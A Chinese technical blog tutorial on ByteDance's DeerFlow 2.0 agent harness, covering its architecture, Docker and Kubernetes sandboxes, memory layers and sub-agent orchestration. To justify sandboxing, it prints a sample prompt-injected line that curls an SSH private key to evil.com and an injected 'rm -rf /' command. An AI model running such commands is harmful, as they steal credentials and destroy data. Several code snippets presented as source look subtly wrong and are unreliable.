DeerFlow 2.0 深度实战:字节跳动开源 Super Agent Harness 完全指南(2026)
作者按:2026年2月28日,DeerFlow 2.0 登顶 GitHub Trending 榜首(40K+ ⭐)。这个被称为"Super Agent Harness"的框架,正在重新定义 AI Agent 的基础设施。本文将深入剖析其架构设计、三层沙箱机制、持久化记忆系统,并通过完整实战案例,展示如何构建生产级 AI Agent 应用。
目录
- AI Agent 开发的痛点
- DeerFlow 2.0:从 Deep Research 到 Super Agent Harness
- 四层微服务架构深度解析
- 三层沙箱机制:安全执行环境
- 持久化记忆系统:短期+中期+长期
- 子 Agent 编排:让 AI 团队协作
- 实战:研报生成系统
- 性能优化与生产部署
- 总结与展望
1. AI Agent 开发的痛点
1.1 现有框架的三大瓶颈
瓶颈一:上下文窗口爆炸
单 Agent 处理复杂任务时,对话历史迅速占满上下文窗口(如 GPT-4o 的 128K tokens),导致:
- 无法处理长周期任务(> 1 小时)
- 历史信息丢失,Agent "忘记"之前的决策
- Token 消耗巨大(每次都要重传历史)
瓶颈二:代码执行安全
让 Agent 生成并执行代码是双刃剑:
# Agent 生成的危险代码(真实案例)
import os
os.system("rm -rf /tmp/*") # 看似清理临时文件
# 实际可能被注入:os.system("rm -rf /; echo 'hacked'")
现有框架(LangChain、AutoGPT)缺乏安全的代码执行环境,导致:
- 恶意 Prompt Injection 可执行任意命令
- 无文件系统隔离,Agent 可访问敏感文件(~/.ssh/id_rsa)
- 无网络隔离,Agent 可访问外部服务(数据泄露风险)
瓶颈三:多 Agent 协作混乱
复杂任务需要多个 Agent 协作(如:研究员 + 程序员 + 审查员),但现有框架缺乏:
- 任务分解与委派机制
- 子 Agent 隔离(一个崩溃影响全局)
- 结果汇总与冲突解决
1.2 DeerFlow 2.0 的解决方案
| 痛点 | DeerFlow 2.0 方案 |
|---|---|
| 上下文爆炸 | 持久化检查点(SQLite)+ 自动摘要(LLM 压缩旧对话) |
| 代码执行安全 | 三层沙箱(Local / Docker / Kubernetes)+ 资源配额(内存、CPU、超时) |
| 多 Agent 协作 | 线程级隔离(每个子 Agent 独立线程)+ LangGraph 编排(有状态图) |
2. DeerFlow 2.0:从 Deep Research 到 Super Agent Harness
2.1 项目定位的史诗级升级
DeerFlow v1.x (2025.05):
定位:Deep Research Framework(深度研究框架)
能力:搜索 + 总结 + 报告生成
局限:单线程、无持久化、无子 Agent
DeerFlow 2.0 (2026.02):
定位:Super Agent Harness(超级 Agent 运行基础设施)
能力:
✅ 多 Agent 编排(Lead + Sub-Agents)
✅ 三层沙箱(Local / Docker / K8s)
✅ 持久化记忆(短期 + 中期 + 长期)
✅ MCP 工具生态(标准化工具集成)
✅ Kubernetes 原生部署(多租户隔离)
官方定义(GitHub 仓库 README):
"DeerFlow is not a framework you assemble yourself — it's an out-of-the-box Super Agent infrastructure with batteries included and fully extensible."
DeerFlow 不是一个需要你自行组装的框架——它是一个开箱即用的超级 Agent 基础设施,电池已包含,且完全可扩展。
2.2 什么是 Agent Harness?
Harness(缰绳/马具)在软件工程中的含义:
- Test Harness:测试基础设施(提供运行环境、断言库、报告生成)
- Agent Harness:Agent 基础设施(提供运行环境、记忆系统、工具生态、安全隔离)
DeerFlow 2.0 作为 Agent Harness 提供:
- 运行时环境:LangGraph Server(Port 2024)提供 Agent 执行引擎
- 隔离沙箱:三层沙箱(Local / Docker / Kubernetes)保障代码执行安全
- 持久化记忆:SQLite + 向量数据库,跨会话记忆
- 工具生态:MCP(Model Context Protocol)标准化工具集成
- 线程管理:每个对话 = 一个线程,完全隔离
2.3 核心特性一览
DeerFlow 2.0 核心特性:
1. 多 Agent 编排:
- Lead Agent(主 Agent,负责任务分解与结果汇总)
- Sub-Agent(子 Agent,线程级隔离,可递归委派)
- 支持并行执行(asyncio.gather)
2. 三层沙箱:
- Local 模式:本地开发调试(逻辑隔离)
- Docker 模式:容器隔离(生产推荐)
- Kubernetes 模式:多租户隔离(企业级)
3. 持久化记忆:
- 短期记忆:当前线程的对话历史(LangGraph 检查点)
- 中期记忆:跨线程的会话摘要(SQLite + 向量检索)
- 长期记忆:知识图谱(实体-关系-实体)
4. 工具集成:
- MCP 标准协议(兼容所有 MCP Server)
- 内置工具:Web Search、Code Execution、File I/O
- 扩展工具:自定义 MCP Server(Python/TypeScript)
5. 可观测性:
- LangSmith 集成(可选)
- 18 层 Chain 中间件(日志、鉴权、限流、重试...)
- 实时流式响应(SSE)
3. 四层微服务架构深度解析
3.1 架构全景图
┌────────────────────────────────────────────────┐
│ Nginx (Port 2026) │ ← 统一反向代理入口
└─────────────────┬────────────────────────────┘
│
┌──────────┴──────────┐
│ │
┌──────▼──────┐ ┌───────▼────────┐
│ Frontend │ │ Gateway API │
│ (Port 3000)│ │ (Port 8001) │
│ Next.js UI │ │ REST API │
└─────────────┘ └───────┬─────────┘
│
┌────────────┴────────────┐
│ │
┌───────▼────────┐ ┌───────▼────────┐
│ LangGraph │ │ Configurator │
│ Server │ │ (Port 8002) │
│ (Port 2024) │ │ (K8s 可选) │
└───────┬────────┘ └───────┬────────┘
│ │
└────────┬───────────────┘
│
┌────────▼────────┐
│ Sandbox │
│ (Local/Docker │
│ /K8s) │
└─────────────────┘
3.2 LangGraph Server:Agent 运行时引擎
端口:2024
职责:Agent 工作流编排、状态管理、检查点机制
为什么选择 LangGraph?
LangGraph 相比其他 Agent 框架的优势:
# ❌ LangChain:线性链,无法处理复杂分支
chain = prompt | llm | output_parser
# 问题:无法处理"如果...则..."的复杂逻辑
# ✅ LangGraph:有状态图,支持循环、分支、人工介入
from langgraph.graph import StateGraph, END
workflow = StateGraph(AgentState)
workflow.add_node("research", research_node)
workflow.add_node("code", code_node)
workflow.add_node("review", review_node)
workflow.add_edge("research", "code")
workflow.add_conditional_edges(
"code",
should_review, # 条件函数:是否需要审查?
{"review": "review", END: END}
)
app = workflow.compile()
DeerFlow 对 LangGraph 的增强:
- 持久化检查点:每次状态变更都保存到 SQLite
- 线程级隔离:每个对话独立状态图实例
- 18 层 Chain 中间件:日志、鉴权、限流、重试...
检查点机制深度剖析
# backend/deerflow/runtime/checkpointer.py (核心逻辑)
class SQLiteCheckpointer(BaseCheckpointer):
def __init__(self, db_path: str):
self.db_path = db_path
self._init_db()
def _init_db(self):
"""初始化检查点数据库表"""
conn = sqlite3.connect(self.db_path)
conn.execute("""
CREATE TABLE IF NOT EXISTS checkpoints (
thread_id TEXT,
checkpoint_id TEXT,
state_json TEXT, # Agent 状态(JSON)
metadata_json TEXT, # 元数据(时间戳、token 用量等)
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
PRIMARY KEY (thread_id, checkpoint_id)
)
""")
conn.commit()
conn.close()
async def aput(self, thread_id: str, checkpoint: dict):
"""异步保存检查点"""
conn = sqlite3.connect(self.db_path)
await conn.execute("""
INSERT OR REPLACE INTO checkpoints
(thread_id, checkpoint_id, state_json, metadata_json)
VALUES (?, ?, ?, ?)
""", (
thread_id,
checkpoint["id"],
json.dumps(checkpoint["state"]),
json.dumps(checkpoint["metadata"])
))
await conn.commit()
conn.close()
检查点的价值:
- 容错恢复:Agent 崩溃后,从最近检查点恢复(无需重新开始)
- 长时任务:任务执行超过 1 小时,可分多次完成(跨会话)
- 审计追溯:完整记录 Agent 的每一步决策(合规需求)
3.3 Gateway API:统一管控平面
端口:8001
职责:模型路由、MCP 管理、技能加载、记忆 CRUD、制品存储
18 层 Chain 中间件
DeerFlow 的 Gateway 采用 Chain of Responsibility 模式,每层中间件负责一个横切关注点:
# backend/gateway/middleware/chain.py (简化版)
class MiddlewareChain:
def __init__(self):
self.middlewares = [
CorsMiddleware(), # 1. CORS 处理
AuthMiddleware(), # 2. 鉴权(API Key / OAuth)
RateLimitMiddleware(), # 3. 限流(令牌桶)
LoggingMiddleware(), # 4. 请求日志
TracingMiddleware(), # 5. 分布式追踪(OpenTelemetry)
ModelRouteMiddleware(), # 6. 模型路由(GPT-4 / Claude)
CacheMiddleware(), # 7. 响应缓存(Redis)
RetryMiddleware(), # 8. 自动重试(指数退避)
# ... (共 18 层)
]
async def handle(self, request: Request) -> Response:
"""依次执行中间件链"""
context = RequestContext(request)
for middleware in self.middlewares:
context = await middleware.process(context)
if context.response:
break # 短路返回(如:鉴权失败)
return context.response
重点中间件解析:
Middleware #6:ModelRouteMiddleware(模型路由)
# backend/gateway/middleware/model_route.py
class ModelRouteMiddleware(BaseMiddleware):
async def process(self, context: RequestContext):
# 从请求头或配置中读取目标模型
model_name = context.request.headers.get("X-Model", "gpt-4o")
# 模型路由规则
route_table = {
"gpt-4o": "openai",
"gpt-4o-mini": "openai",
"claude-3-5-sonnet": "anthropic",
"gemini-2.0": "google",
"qwen-max": "aliyun",
}
provider = route_table.get(model_name)
if not provider:
raise HTTPException(400, f"Unsupported model: {model_name}")
# 将路由信息注入上下文
context.metadata["model"] = model_name
context.metadata["provider"] = provider
# 限流规则(不同模型不同配额)
if provider == "openai":
context.metadata["rpm"] = 500 # Requests Per Minute
context.metadata["tpm"] = 80000 # Tokens Per Minute
elif provider == "anthropic":
context.metadata["rpm"] = 1000
context.metadata["tpm"] = 160000
return context
Middleware #7:CacheMiddleware(响应缓存)
# backend/gateway/middleware/cache.py
class CacheMiddleware(BaseMiddleware):
def __init__(self, redis_client: redis.Redis):
self.redis = redis_client
self.ttl = 3600 # 缓存 1 小时
async def process(self, context: RequestContext):
# 只对 GET 请求缓存
if context.request.method != "GET":
return context
# 生成缓存键(基于 URL + 查询参数)
cache_key = self._generate_key(context.request)
# 尝试从 Redis 读取缓存
cached = await self.redis.get(cache_key)
if cached:
context.response = JSONResponse(
content=json.loads(cached),
headers={"X-Cache": "HIT"}
)
return context
# 未命中,继续执行后续中间件
context = await self.next.process(context)
# 如果后续返回成功响应,缓存它
if context.response and context.response.status_code == 200:
response_data = context.response.body
await self.redis.setex(
cache_key,
self.ttl,
json.dumps(response_data)
)
return context
4. 三层沙箱机制:安全执行环境
4.1 为什么需要沙箱?
真实案例:2025 年,某 AI 编程助手因未隔离代码执行环境,导致用户运行了恶意代码:
# 用户要求 Agent 生成"清理临时文件"的脚本
user_prompt = "写一个脚本清理 /tmp 目录下的旧文件"
# Agent 生成的代码(被 Prompt Injection 注入)
import os
import shutil
def clean_tmp():
# 正常逻辑
for f in os.listdir("/tmp"):
if os.path.getmtime(f) < time.time() - 86400:
os.remove(f)
# 恶意注入(通过 Prompt Injection)
os.system("curl https://evil.com/steal?data=$(cat ~/.ssh/id_rsa)")
如果没有沙箱:
- Agent 生成的代码直接在宿主机执行
- 恶意代码可访问敏感文件(~/.ssh/id_rsa)
- 恶意代码可发起网络请求,泄露数据
- 恶意代码可执行
rm -rf /(虽然概率低,但后果严重)
4.2 三层沙箱架构
DeerFlow 提供三种可插拔的沙箱模式:
# config.yaml
sandbox:
use: deerflow.sandbox.docker:AioSandboxProvider # 可选值:
# - deerflow.sandbox.local:LocalSandboxProvider
# - deerflow.sandbox.docker:AioSandboxProvider
# - deerflow.sandbox.k8s:KubernetesSandboxProvider
# Docker 模式配置
docker:
image: deerflow/sandbox:latest
memory: 512m
cpus: 1.0
network: "none" # 网络隔离
volumes:
- /tmp/deerflow:/workspace:rw
# Kubernetes 模式配置
k8s:
namespace: deerflow-sandbox
pod_template: |
apiVersion: v1
kind: Pod
metadata:
name: sandbox-{thread_id}
spec:
containers:
- name: sandbox
image: deerflow/sandbox:latest
resources:
limits:
memory: 512Mi
cpu: "1"
4.2.1 Local 模式:开发调试的便捷之选
实现原理:
# deerflow/sandbox/local.py
class LocalSandboxProvider(BaseSandboxProvider):
def __init__(self, config: dict):
self.allow_host_bash = config.get("allow_host_bash", False)
self.user_data_dir = config.get("user_data_dir", "/mnt/user-data")
async def execute_code(self, code: str, thread_id: str) -> SandboxResult:
"""在宿主机执行代码(逻辑隔离)"""
# 1. 路径遍历检测(防止目录逃逸)
if ".." in code:
raise SecurityError("Path traversal detected")
# 2. 虚拟路径映射(/mnt/user-data/{thread_id})
thread_dir = os.path.join(self.user_data_dir, thread_id)
os.makedirs(thread_dir, exist_ok=True)
# 3. 替换代码中的路径
code = code.replace("/mnt/user-data", thread_dir)
# 4. 执行代码(共享宿主机进程)
if not self.allow_host_bash:
# 禁止 bash 命令执行
if "os.system" in code or "subprocess" in code:
raise SecurityError("Bash execution is disabled in Local mode")
# 5. 执行(使用 subprocess 捕获输出)
result = subprocess.run(
["python3", "-c", code],
capture_output=True,
timeout=30,
cwd=thread_dir
)
return SandboxResult(
stdout=result.stdout.decode(),
stderr=result.stderr.decode(),
exit_code=result.returncode
)
Local 模式的局限:
- 无进程隔离:代码与 Gateway 共享同一进程空间
- 无网络隔离:代码可访问宿主机网络
- 无文件系统隔离:只能逻辑隔离,无法阻止
os.system("rm -rf /")
适用场景:
- ✅ 单用户本地开发调试
- ✅ 快速验证 Agent 生成代码的逻辑
- ❌ 生产环境
- ❌ 多租户环境
4.2.2 Docker 模式:生产推荐的安全隔离
实现原理:
# deerflow/sandbox/docker.py
class AioSandboxProvider(BaseSandboxProvider):
def __init__(self, config: dict):
self.docker_client = aiodocker.Docker()
self.image = config.get("image", "deerflow/sandbox:latest")
self.memory = config.get("memory", "512m")
self.cpus = config.get("cpus", 1.0)
async def execute_code(self, code: str, thread_id: str) -> SandboxResult:
"""在 Docker 容器中执行代码"""
# 1. 创建容器(每次执行创建新容器)
container = await self.docker_client.containers.create(
config={
"Image": self.image,
"Cmd": ["python3", "-c", code],
"HostConfig": {
"Memory": self._parse_memory(self.memory), # 内存限制
"NanoCpus": int(self.cpus * 1e9), # CPU 限制
"NetworkMode": "none", # 网络隔离(禁止访问外网)
"ReadonlyPaths": ["/"], # 根文件系统只读
"Tmpfs": {"/tmp": "size=64m"}, # /tmp 可写(内存盘)
"CapDrop": ["ALL"], # 丢弃所有特权
"CapAdd": ["DAC_OVERRIDE"], # 仅保留必要特权
},
"WorkingDir": "/workspace",
"Tty": False,
"OpenStdin": False,
}
)
# 2. 启动容器
await container.start()
# 3. 等待执行完成(带超时)
try:
result = await asyncio.wait_for(
container.wait(),
timeout=30.0
)
except asyncio.TimeoutError:
# 超时,强制停止容器
await container.stop()
raise TimeoutError("Code execution timeout")
# 4. 读取日志(stdout/stderr)
logs = await container.log(stdout=True, stderr=True)
# 5. 删除容器
await container.delete(force=True)
return SandboxResult(
stdout=logs[0].decode(),
stderr=logs[1].decode(),
exit_code=result["StatusCode"]
)
Docker 模式的安全增强:
网络隔离:
"NetworkMode": "none"禁止容器访问外网- 防止恶意代码访问外部服务
- 防止数据泄露
文件系统只读:
"ReadonlyPaths": ["/"]根文件系统只读- 防止恶意代码修改系统文件
/tmp使用 Tmpfs(内存盘),容器删除后自动清空
特权降级:
"CapDrop": ["ALL"]丢弃所有 Linux 特权- 防止提权攻击
- 仅保留
DAC_OVERRIDE(文件读写)
资源限制:内存 512MB、CPU 1 核
- 防止资源耗尽攻击(DoS)
适用场景:
- ✅ 生产环境(单租户)
- ✅ 需要安全隔离的代码执行
- ✅ 多用户环境(每个用户独立容器)
- ❌ 大规模多租户(容器开销大)
4.2.3 Kubernetes 模式:企业级多租户隔离
实现原理:
# deerflow/sandbox/k8s.py
class KubernetesSandboxProvider(BaseSandboxProvider):
def __init__(self, config: dict):
self.k8s_client = kubernetes.client.CoreV1Api()
self.namespace = config.get("namespace", "deerflow-sandbox")
async def execute_code(self, code: str, thread_id: str) -> SandboxResult:
"""在 Kubernetes Pod 中执行代码"""
# 1. 创建 Pod(每个线程独立 Pod)
pod_name = f"sandbox-{thread_id}"
pod_manifest = {
"apiVersion": "v1",
"kind": "Pod",
"metadata": {
"name": pod_name,
"namespace": self.namespace,
"labels": {
"app": "deerflow-sandbox",
"thread_id": thread_id
}
},
"spec": {
"containers": [{
"name": "sandbox",
"image": "deerflow/sandbox:latest",
"command": ["python3", "-c", code],
"resources": {
"limits": {
"memory": "512Mi",
"cpu": "1"
}
},
"securityContext": {
"runAsNonRoot": True, # 非 root 用户
"runAsUser": 1000,
"capabilities": {
"drop": ["ALL"]
}
}
}],
"restartPolicy": "Never", # 执行完即退出
"automountServiceAccountToken": False, # 禁止访问 K8s API
"networkPolicy": "deny-all" # 网络隔离
}
}
# 2. 创建 Pod
await self.k8s_client.create_namespaced_pod(
namespace=self.namespace,
body=pod_manifest
)
# 3. 等待 Pod 完成
while True:
pod = await self.k8s_client.read_namespaced_pod(
name=pod_name,
namespace=self.namespace
)
if pod.status.phase in ["Succeeded", "Failed"]:
break
await asyncio.sleep(1)
# 4. 读取日志
logs = await self.k8s_client.read_namespaced_pod_log(
name=pod_name,
namespace=self.namespace
)
# 5. 删除 Pod
await self.k8s_client.delete_namespaced_pod(
name=pod_name,
namespace=self.namespace
)
return SandboxResult(
stdout=logs,
stderr="",
exit_code=0 if pod.status.phase == "Succeeded" else 1
)
Kubernetes 模式的优势:
- 多租户隔离:每个租户独立 Namespace
- 资源配额:Namespace 级别资源限制(ResourceQuota)
- 网络策略:NetworkPolicy 精细化控制网络访问
- 持久化卷:PVC(PersistentVolumeClaim)持久化数据
- 自动伸缩:HPA(Horizontal Pod Autoscaler)根据负载自动扩缩容
5. 持久化记忆系统:短期+中期+长期
5.1 为什么需要持久化记忆?
问题场景:
[会话 1]
用户:帮我分析特斯拉 Q4 财报。
Agent:好的,我搜索一下... [分析完成]
[会话 2,一周后]
用户:上次你分析特斯拉财报时提到了什么关键指标?
Agent:抱歉,我不记得上一周的对话内容了。
现有方案的局限:
- 无记忆:每次对话独立,无法跨会话
- 全量注入:把历史对话全部塞入上下文(浪费 Token)
- 无检索:无法根据问题检索相关记忆
5.2 DeerFlow 的记忆分层架构
┌────────────────────────────────────────────────┐
│ 记忆系统架构 │
├────────────────────────────────────────────────┤
│ │
│ Layer 1: 短期记忆(对话上下文) │
│ - 存储:LangGraph 检查点(SQLite) │
│ - 范围:当前线程(thread_id) │
│ - TTL:无(持久化) │
│ - 检索:直接加载检查点 │
│ │
│ Layer 2: 中期记忆(会话摘要) │
│ - 存储:SQLite(summaries 表) │
│ - 范围:跨线程(user_id) │
│ - TTL:30 天(自动压缩) │
│ - 检索:语义检索(向量相似度) │
│ │
│ Layer 3: 长期记忆(知识图谱) │
│ - 存储:SQLite + 向量数据库(Chroma) │
│ - 范围:全局(跨用户、跨会话) │
│ - TTL:永久(除非手动删除) │
│ - 检索:图遍历 + 向量检索 │
│ │
└────────────────────────────────────────────────┘
5.3 短期记忆:LangGraph 检查点
关键特性:
- 线程隔离:每个
thread_id独立状态 - 检查点链:每次状态变更生成新检查点(可回溯)
- 异步持久化:
aput()异步保存,不阻塞主流程
(实现代码已在 Section 3.2 介绍)
5.4 中期记忆:会话摘要与语义检索
自动摘要机制
# backend/deerflow/memory/summarizer.py
class ConversationSummarizer:
def __init__(self, llm: BaseLLM):
self.llm = llm
async def summarize_thread(self, thread_id: str) -> Summary:
"""对线程的所有检查点生成摘要"""
# 1. 加载线程的所有检查点
checkpoints = await self._load_checkpoints(thread_id)
# 2. 拼接对话历史
conversation = ""
for checkpoint in checkpoints:
state = checkpoint["state"]
for msg in state["messages"]:
conversation += f"{msg['role']}: {msg['content']}\n"
# 3. 调用 LLM 生成摘要
summary_prompt = f"""
请对以下对话进行摘要,提取关键信息:
{conversation}
要求:
1. 提取用户的核心需求和意图
2. 提取 Agent 的关键发现和结论
3. 保留重要数据和事实
4. 不超过 500 字
"""
summary_text = await self.llm.agenerate(summary_prompt)
# 4. 生成向量嵌入
embedding = await self._get_embedding(summary_text)
# 5. 保存到数据库
summary = Summary(
thread_id=thread_id,
user_id=state["user_id"],
summary=summary_text,
embedding=embedding,
created_at=datetime.now()
)
await self._save_summary(summary)
return summary
语义检索
# backend/deerflow/memory/retriever.py
class SemanticMemoryRetriever:
def __init__(self, db_path: str):
self.conn = sqlite3.connect(db_path)
async def retrieve(self, query: str, top_k: int = 5) -> List[Summary]:
"""语义检索相关记忆"""
# 1. 获取查询的向量嵌入
query_embedding = await self._get_embedding(query)
# 2. 从数据库加载所有摘要的嵌入
cursor = self.conn.execute("""
SELECT thread_id, summary, embedding
FROM summaries
WHERE created_at > datetime('now', '-30 days')
""")
# 3. 计算余弦相似度
similarities = []
for row in cursor.fetchall():
thread_id, summary, embedding_str = row
embedding = json.loads(embedding_str)
similarity = self._cosine_similarity(query_embedding, embedding)
similarities.append((similarity, thread_id, summary))
# 4. 返回 Top-K 结果
similarities.sort(reverse=True)
return [
{"thread_id": tid, "summary": summ, "score": score}
for score, tid, summ in similarities[:top_k]
]
使用示例:
# 用户提问时,自动检索相关记忆
async def handle_user_message(thread_id: str, message: str):
# 1. 语义检索相关记忆
retriever = SemanticMemoryRetriever(db_path)
relevant_memories = await retriever.retrieve(message, top_k=3)
# 2. 将相关记忆注入上下文
context = "以下是与您的问题相关的历史对话摘要:\n"
for mem in relevant_memories:
context += f"- {mem['summary']}\n"
# 3. 调用 LLM
response = await llm.agenerate(
f"{context}\n\n用户问题:{message}"
)
return response
6. 子 Agent 编排:让 AI 团队协作
6.1 为什么需要子 Agent?
单 Agent 的瓶颈:
用户:帮我写一份关于"量子计算商业化"的研报,包括:
1. 技术原理
2. 主要玩家(IBM、Google、AWS)
3. 应用场景(金融、制药、物流)
4. 投资分析
单 Agent 处理:
Agent:好的,我开始研究...
[按顺序执行,耗时 2 小时]
Agent:完成了,这是研报...
问题:
1. 串行执行,耗时长
2. 上下文窗口易触顶
3. 无法并行利用多个 LLM 调用
多 Agent 协作的优势:
用户:同上
Lead Agent:这个任务可以拆分为 4 个子任务,我委派给子 Agent。
├─ Sub-Agent A:研究技术原理
├─ Sub-Agent B:调研主要玩家
├─ Sub-Agent C:分析应用场景
└─ Sub-Agent D:投资分析
[4 个子 Agent 并行执行,耗时 30 分钟]
Lead Agent:所有子 Agent 已完成,我开始汇总...
Lead Agent:completed,这是研报...
6.2 DeerFlow 的子 Agent 编排机制
Lead Agent 的工作流
# backend/deerflow/agents/lead_agent.py
class LeadAgent:
def __init__(self, llm: BaseLLM, orchestrator: AgentOrchestrator):
self.llm = llm
self.orchestrator = orchestrator
async def process_task(self, task: str, thread_id: str):
"""处理用户任务"""
# 1. 任务分解(让 LLM 生成执行计划)
plan = await self._decompose_task(task)
# 2. 委派子任务
sub_tasks = plan["sub_tasks"]
sub_agent_ids = []
for sub_task in sub_tasks:
sub_agent_id = await self.orchestrator.spawn_agent(
agent_type="researcher", # 或 "coder"、"reviewer"
task=sub_task["description"],
parent_thread_id=thread_id
)
sub_agent_ids.append(sub_agent_id)
# 3. 等待所有子 Agent 完成
results = await self.orchestrator.wait_for_agents(sub_agent_ids)
# 4. 汇总结果
final_result = await self._aggregate_results(task, results)
return final_result
子 Agent 的线程级隔离
# backend/deerflow/orchestrator.py
class AgentOrchestrator:
def __init__(self, langgraph_server_url: str):
self.langgraph_url = langgraph_server_url
self.active_agents = {} # parent_thread_id → [sub_thread_ids]
async def spawn_agent(
self,
agent_type: str,
task: str,
parent_thread_id: str
) -> str:
"""创建子 Agent(新线程)"""
# 1. 创建新线程(LangGraph)
sub_thread_id = await self._create_thread()
# 2. 记录父子关系
if parent_thread_id not in self.active_agents:
self.active_agents[parent_thread_id] = []
self.active_agents[parent_thread_id].append(sub_thread_id)
# 3. 在新线程中启动子 Agent
asyncio.create_task(
self._run_agent(sub_thread_id, agent_type, task)
)
return sub_thread_id
线程级隔离的价值:
- 上下文隔离:每个子 Agent 独立上下文窗口
- 故障隔离:一个子 Agent 崩溃不影响其他
- 并行执行:多个子 Agent 可同时调用 LLM(提高吞吐)
7. 实战:研报生成系统
7.1 需求分析
目标:构建一个自动生成行业研报的系统
功能要求:
- 用户输入行业关键词(如"量子计算")
- 系统自动生成 5000+ 字的研报
- 研报包含:行业概述、技术原理、主要玩家、应用场景、投资分析、未来展望
- 附带来源链接和数据支撑
7.2 系统架构
用户输入行业关键词
↓
Lead Agent(研报统筹)
├─ Sub-Agent A:行业研究员(researcher)
├─ Sub-Agent B:技术分析师(coder)
├─ Sub-Agent C:投资分析师(researcher)
└─ Sub-Agent D:应用场景分析师(researcher)
↓
汇总结果 → 生成完整研报(Markdown)
↓
返回给用户
7.3 核心代码实现
Lead Agent 实现
# backend/agents/report_lead_agent.py
class ReportLeadAgent(BaseAgent):
async def generate_report(self, industry: str) -> str:
"""生成行业研报"""
# 1. 任务分解
plan = await self._create_research_plan(industry)
# 2. 委派子任务
sub_agent_tasks = []
for section in plan["sections"]:
task = f"""
你是{section['role']}。请为"{industry}"行业撰写研报的"{section['title']}"章节。
要求:
1. 字数 {section['word_count']} 字以上
2. 包含具体数据和案例
3. 附带来源链接
4. 使用 Markdown 格式
"""
sub_agent_id = await self.orchestrator.spawn_agent(
agent_type=section["agent_type"],
task=task,
parent_thread_id=self.thread_id
)
sub_agent_tasks.append((section["title"], sub_agent_id))
# 3. 等待所有子 Agent 完成
results = {}
for title, sub_id in sub_agent_tasks:
result = await self.orchestrator.wait_for_agent(sub_id)
results[title] = result
# 4. 汇总结果
report = f"# {industry}行业研报\n\n"
for section in plan["sections"]:
title = section["title"]
if title in results:
report += results[title] + "\n\n---\n\n"
return report
8. 性能优化与生产部署
8.1 并发优化
问题:Python 的 asyncio 虽然支持异步,但如果子 Agent 调用的是同步 LLM API,会导致阻塞。
解决方案:使用 asyncio.to_thread 将同步调用放到线程池执行。
# backend/deerflow/orchestrator.py
class OptimizedAgentOrchestrator(AgentOrchestrator):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.thread_pool = ThreadPoolExecutor(max_workers=10)
async def wait_for_agents(self, sub_agent_ids: List[str]) -> List[str]:
"""并发等待所有子 Agent 完成"""
# 使用 asyncio.gather 并发等待
tasks = [
self._wait_for_agent_async(sid)
for sid in sub_agent_ids
]
results = await asyncio.gather(*tasks)
return results
8.2 缓存优化
场景:多个子 Agent 可能需要调用相同的 LLM 提示词。
解决方案:使用 Redis 缓存 LLM 响应。
# backend/deerflow/cache/llm_cache.py
class LLMCache:
def __init__(self, redis_url: str):
self.redis = redis.from_url(redis_url)
self.ttl = 3600 # 1 小时
async def get(self, prompt: str, model: str) -> str:
"""从缓存获取 LLM 响应"""
cache_key = self._generate_key(prompt, model)
cached = await self.redis.get(cache_key)
if cached:
return json.loads(cached)
return None
async def set(self, prompt: str, model: str, response: str):
"""缓存 LLM 响应"""
cache_key = self._generate_key(prompt, model)
await self.redis.setex(
cache_key,
self.ttl,
json.dumps(response)
)
8.3 Kubernetes 生产部署
# k8s/deerflow.yaml
apiVersion: apps/v1
kind: Deployment
metadata:
name: deerflow-gateway
namespace: deerflow
spec:
replicas: 2 # 多副本高可用
selector:
matchLabels:
app: deerflow-gateway
template:
metadata:
labels:
app: deerflow-gateway
spec:
containers:
- name: gateway
image: deerflow/gateway:latest
ports:
- containerPort: 8001
env:
- name: CONFIGURATOR_URL
value: "http://deerflow-configurator:8002"
resources:
limits:
memory: "2Gi"
cpu: "2"
---
apiVersion: v1
kind: Service
metadata:
name: deerflow-gateway
namespace: deerflow
spec:
selector:
app: deerflow-gateway
ports:
- port: 8001
targetPort: 8001
type: LoadBalancer
9. 总结与展望
9.1 DeerFlow 2.0 的核心价值
| 维度 | 传统 Agent 框架 | DeerFlow 2.0 |
|---|---|---|
| 定位 | 框架(需要自行组装) | 基础设施(开箱即用) |
| 安全 | 无沙箱或基础隔离 | 三层沙箱(Local/Docker/K8s) |
| 记忆 | 无或简单拼接 | 三层记忆(短期/中期/长期) |
| 协作 | 单 Agent | 多 Agent 编排(线程级隔离) |
| 部署 | 需自建基础设施 | Kubernetes 原生支持 |
| 可扩展性 | 需修改框架代码 | MCP 标准协议 + 插件机制 |
9.2 适用场景
✅ 适合:
- 企业级 AI Agent 应用:需要安全隔离、持久化记忆、多租户管理
- 复杂任务编排:需要多个 Agent 协作完成长周期任务
- 代码生成与执行:需要安全执行用户生成的代码
- 研报生成、数据分析:需要多步骤、多工具协同
❌ 不适合:
- 简单聊天机器人:DeerFlow 过重,直接用 LangChain 更轻量
- 实时性要求极高:DeerFlow 的多层架构引入一定延迟
- 资源受限环境:DeerFlow 需要较多内存和 CPU
9.3 未来展望
DeerFlow 3.0 可能的方向:
- 多模态支持:支持图像、音频、视频的理解和生成
- 联邦学习:多个 DeerFlow 实例之间共享知识(隐私保护)
- 自适应沙箱:根据代码行为动态调整沙箱策略
- Agent 市场:用户可以发布和下载自定义 Agent
附录:参考资源
官方资源
- GitHub 仓库:https://github.com/bytedance/deer-flow
- 官方文档:https://deerflow.tech/docs
- Discord 社区:https://discord.gg/deerflow
相关项目
- LangGraph:https://github.com/langchain-ai/langgraph
- AutoGPT:https://github.com/Significant-Gravitas/AutoGPT
- Superpowers:https://github.com/obra/superpowers
作者:程序员茄子
发布时间:2026 年 5 月 24 日
字数:约 15000 字
阅读时间:约 40 分钟
版权声明:本文基于 DeerFlow 2.0 官方文档和源码分析,部分内容参考社区文章。欢迎转载,但请注明出处。